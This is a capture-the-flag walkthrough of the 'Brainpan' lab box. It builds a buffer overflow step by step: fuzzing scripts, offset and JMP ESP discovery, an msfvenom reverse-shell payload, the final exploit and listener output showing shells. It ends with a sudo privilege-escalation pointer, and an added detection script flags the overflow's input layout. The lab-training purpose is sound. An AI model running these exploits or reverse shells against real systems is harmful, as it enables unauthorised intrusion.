nmap -sC -sV 10.10.222.251 -oN nmap.out
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 12:30 IST
Nmap scan report for 10.10.222.251
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
| fingerprint-strings:
|   NULL:
|     (BRAINPAN ASCII-art banner)
|     [________________________ WELCOME TO BRAINPAN _________________________]
|_    ENTER THE PASSWORD
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Port 9999 is where the vulnerable executable must be running. We can verify this by connecting with netcat:
nc 10.10.222.251 9999
(BRAINPAN ASCII-art banner)
[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD
                          >> brainpan
                          ACCESS DENIED
Send a cyclic pattern to the password prompt with the following script (the pattern is generated with pattern_create.rb):

#!/usr/bin/python3
import socket

ip = "LOCAL_IP"
port = 9999
timeout = 5

payload = b'<PATTERN_GOES_HERE>'   # cyclic pattern from pattern_create.rb

try:
    s = socket.socket()
    s.settimeout(timeout)
    s.connect((ip, port))
    s.recv(1024)                   # read the banner and password prompt
    s.send(payload)
    print("Fuzzing with {} bytes".format(len(payload)))
    s.recv(1024)
    s.close()
except Exception:
    print("Fuzzing crashed at {} bytes".format(len(payload)))
    exit()
EIP value at the crash = 35724134
Find the exact offset:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 35724134
[*] Exact match at offset 524
Finding bad characters
Generate every byte value from \x01 to \xff with Python and send it after the 524-byte offset. Run the Python script:
#!/usr/bin/python3
import socket
import struct

ip = "LOCAL_IP"
port = 9999
timeout = 5
offset = 524

eip = b'B' * 4                                                        # placeholder return address
allchars = b''.join([struct.pack('<B', x) for x in range(1, 256)])    # every byte except \x00

payload = b''.join([b'A' * offset, eip, allchars])

try:
    s = socket.socket()
    s.settimeout(timeout)
    s.connect((ip, port))
    s.recv(1024)
    s.send(payload)
    print("Fuzzing with {} bytes".format(len(payload) - len(eip) - len(allchars)))
    s.recv(1024)
    s.close()
except Exception:
    print("Fuzzing crashed at {} bytes".format(len(payload) - len(eip) - len(allchars)))
    exit()
There are no bad characters in brainpan apart from \x00 (which was left out of the range above).
Finding the right module
To list the loaded modules in Immunity Debugger: !mona modules
Only brainpan.exe is loaded without any memory protections.
To find a JMP ESP within that module, excluding pointers that contain the bad byte \x00: !mona jmp -r esp -m brainpan.exe -cpb \x00
mona returns exactly one pointer that fits our requirements:
So EIP must be overwritten with 311712F3 (written little-endian in the payload).
We can verify this by setting a breakpoint on that address in Immunity Debugger and running the following script:
#!/usr/bin/python3
import socket
import struct

ip = "LOCAL_IP"
port = 9999
timeout = 5
offset = 524

eip = struct.pack('<I', 0x311712F3)     # JMP ESP in brainpan.exe, little-endian
payload = b''.join([b'A' * offset, eip])

try:
    s = socket.socket()
    s.settimeout(timeout)
    s.connect((ip, port))
    s.recv(1024)
    s.send(payload)
    print("Fuzzing with {} bytes".format(len(payload) - len(eip)))
    s.recv(1024)
    s.close()
except Exception:
    print("Fuzzing crashed at {} bytes".format(len(payload) - len(eip)))
    exit()
Shellcode & shell access
All that is left is to generate the shellcode with msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1712 bytes
buf = b""
(the generated buf += lines are omitted here)
Run the final exploit:
#!/usr/bin/python3
import socket
import struct

ip = "LOCAL_IP"
port = 9999
timeout = 5
offset = 524

eip = struct.pack('<I', 0x311712F3)     # JMP ESP in brainpan.exe, little-endian
nop_sled = b'\x90' * 32
buf = b""                               # Add full buf here (msfvenom output)

payload = b''.join([b'A' * offset, eip, nop_sled, buf])

try:
    s = socket.socket()
    s.settimeout(timeout)
    s.connect((ip, port))
    s.recv(1024)
    s.send(payload)
    print("Fuzzing with {} bytes".format(len(payload) - len(eip) - len(nop_sled) - len(buf)))
    s.recv(1024)
    s.close()
except Exception:
    print("Fuzzing crashed at {} bytes".format(len(payload) - len(eip) - len(nop_sled) - len(buf)))
    exit()
Don't forget to include the NOP sled in the final exploit!
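As an added example (not code from the writeup), here is a defender-side check in the same Python the scripts above use: it inspects what a client sends to the port 9999 password prompt and flags the layout of this overflow (524 bytes of filler, a little-endian return address, a NOP sled, a non-printable tail). The thresholds and the sample inputs are constructed for this example.

```python
#!/usr/bin/python3
# Added example, not part of the original writeup: inspect one client input to the
# brainpan password prompt and report the indicators of the overflow described above.
# OFFSET comes from the pattern_offset result; the other thresholds are constructed.
import struct

OFFSET = 524              # bytes until the saved return address is overwritten
NOP_RUN = b"\x90" * 16    # 16 consecutive x86 NOPs never occur in a real password
MAX_PASSWORD = 64         # constructed limit: longer input is already suspicious


def analyze_input(data: bytes) -> dict:
    """Return a verdict plus the indicators found in one client input."""
    indicators = []
    if len(data) > MAX_PASSWORD:
        indicators.append("oversized:%d" % len(data))
    ret_addr = None
    if len(data) >= OFFSET + 4:
        # The 4 bytes at OFFSET land in EIP; decode them little-endian as the CPU does.
        ret_addr = struct.unpack("<I", data[OFFSET:OFFSET + 4])[0]
        indicators.append("eip_overwrite:0x%08x" % ret_addr)
    if NOP_RUN in data:
        indicators.append("nop_sled")
    nonprintable = sum(1 for b in data if b < 0x20 or b > 0x7e)
    if nonprintable > 8:
        indicators.append("nonprintable:%d" % nonprintable)
    return {"alert": bool(indicators), "ret_addr": ret_addr, "indicators": indicators}


# Constructed samples: a normal login attempt and an input laid out like the final
# exploit (filler, JMP ESP address, NOP sled, then a stand-in for the encoded payload).
NORMAL_LOGIN = b"brainpan\n"
EXPLOIT_SHAPED = (b"A" * OFFSET + struct.pack("<I", 0x311712F3)
                  + b"\x90" * 32 + bytes(range(1, 256)))

if __name__ == "__main__":
    for sample in (NORMAL_LOGIN, EXPLOIT_SHAPED):
        print(analyze_input(sample))
```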
Gain shell access using a netcat listener:
$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.17.7.91] from (UNKNOWN) [LOCAL_IP] 49249
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\admin\Desktop\vulnerable-apps>whoami
whoami
oscp-bof-prep\admin
This is shell access on the local copy only; next we need to run the same final exploit against the target server.
Gain initial access
Change the IP address and run the exploit again:
$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.17.7.91] from (UNKNOWN) [10.10.216.132] 40321
CMD Version 1.4.1
Z:\home\puck>echo %username%
puck
But the commands seem to alternate between Windows and Linux. So, I changed the payload to a Linux shell: linux/x86/shell_reverse_tcp
Upgrade to an interactive TTY using: python -c 'import pty; pty.spawn("/bin/bash")'
Check the binary that can be run with sudo without a password:
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
  - network
  - proclist
  - manual [command]
The man command can be leveraged to gain root access (check GTFOBins):